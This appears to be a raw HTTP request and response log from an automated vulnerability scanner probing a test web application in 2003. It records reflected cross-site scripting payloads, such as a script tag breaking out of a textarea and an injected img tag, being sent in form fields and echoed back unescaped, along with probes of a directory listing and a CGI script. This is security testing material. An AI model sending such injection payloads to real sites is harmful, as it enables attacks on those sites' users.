HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:55:36 GMT X-Powered-By: ASP.NET Connection: Keep-Alive Content-Length: 4013 Content-Type: text/html Cache-control: private Set-Cookie: passes3=; path=/ Set-Cookie: passes2=; path=/ Set-Cookie: passes=; path=/ <html> <html> <head> <title>Join Us</title> <STYLE> <!-- td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial} A:link {text-decoration: none; color: #FFFFFF;} A:visited {text-decoration: none; color: #FEFCE0;} A:active {text-decoration: none; color: #FFFFFF;} A:hover {text-decoration: none; color:#CCFFFF;} --> </STYLE> </HEAD> <body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0"> <td valign="top" align="center"> <table width="100%" border="0" cellpadding="5" cellspacing="0" align="center"> <tr><td height="32" bgcolor="#c000ff"><center><b>J&nbsp;O&nbsp;I&nbsp;N</b></center></td></tr> <tr><td> <table cellpadding="0" cellspacing="2" border="0" width="400" align="center"> <tr><td>&nbsp;</td></tr> <tr><td>&nbsp;</td></tr> <FORM ACTION="join1.asp" METHOD="get" NAME="TheForm"> <center> <tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <TR><TD align="right" bgcolor=#003388><B>Name:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Surname:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Password:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>House Number:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Street:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=">"'><img src="javascript:alert('XSS')">"></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Town/City:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Postcode:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Country:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Home Phone:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <tr><td align="center" bgcolor=#c000ff colspan='2'>&nbsp;</td></tr> </center> </Table> </table> </body> </html>

GET /include/ HTTP/1.0 Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect

HTTP/1.1 403 Access Forbidden Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:25:10 GMT Content-Type: text/html Content-Length: 172 <html><head><title>Directory Listing Denied</title></head> <body><h1>Directory Listing Denied</h1>This Virtual Directory does not allow contents to be listed.</body></html>

POST /pcomboindex.asp HTTP/1.0 Referer: http://zero.webappsecurity.com:80/pindex.asp Content-Length: 48 Content-Type: application/x-www-form-urlencoded Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect cboPage=</textarea><script>alert('XSS')</script>

HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:38:18 GMT X-Powered-By: ASP.NET Connection: Keep-Alive Content-Length: 975 Content-Type: text/html Cache-control: private <html> <body> A user should never see this text<br> this page is a redirect only page. The page that the user selected was </textarea><script>alert('XSS')</script><br> Page was looking for a value in parameter called cboPage<br><br> <h2>What follows is a dump of the HTTP stuff</h2> <b>Form Variables Passed:</b><br>cboPage= </textarea><script>alert('XSS')</script><br> <b>QueryString variables passed:</b><br><pre>****** Head Data*** Client IP:199.72.29.34 Connection: Close Host: zero.webappsecurity.com Referer: http://zero.webappsecurity.com:80/pindex.asp User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect Content-Length: 48 Content-Type: application/x-www-form-urlencoded ****** End of Head Data*******</pre><br> </body> </html>

GET /join.asp?name=&email=&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0 Referer: http://zero.webappsecurity.com:80/join1.asp Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; passes=; passes2=; passes3=; CustomCookie=WebInspect

HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:41:49 GMT X-Powered-By: ASP.NET Connection: Keep-Alive Content-Length: 3974 Content-Type: text/html Cache-control: private Set-Cookie: passes3=; path=/ Set-Cookie: passes2=; path=/ Set-Cookie: passes=; path=/ <html> <html> <head> <title>Join Us</title> <STYLE> <!-- td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial} A:link {text-decoration: none; color: #FFFFFF;} A:visited {text-decoration: none; color: #FEFCE0;} A:active {text-decoration: none; color: #FFFFFF;} A:hover {text-decoration: none; color:#CCFFFF;} --> </STYLE> </HEAD> <body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0"> <td valign="top" align="center"> <table width="100%" border="0" cellpadding="5" cellspacing="0" align="center"> <tr><td height="32" bgcolor="#c000ff"><center><b>J&nbsp;O&nbsp;I&nbsp;N</b></center></td></tr> <tr><td> <table cellpadding="0" cellspacing="2" border="0" width="400" align="center"> <tr><td>&nbsp;</td></tr> <tr><td>&nbsp;</td></tr> <FORM ACTION="join1.asp" METHOD="get" NAME="TheForm"> <center> <tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <TR><TD align="right" bgcolor=#003388><B>Name:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Surname:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Password:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>House Number:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Street:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Town/City:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Postcode:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Country:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Home Phone:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <tr><td align="center" bgcolor=#c000ff colspan='2'>&nbsp;</td></tr> </center> </Table> </table> </body> </html>

GET /cgi-bin/mailfile.cgi HTTP/1.0 Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect

HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 X-Powered-By: ASP.NET Date: Thu, 04 Dec 2003 16:41:59 GMT Content-Type: application/octet-stream Accept-Ranges: bytes Last-Modified: Mon, 16 Jul 2001 03:47:02 GMT ETag: "b4c3f1f8a9dc11:8f6" Content-Length: 12 MAILFILE.CGI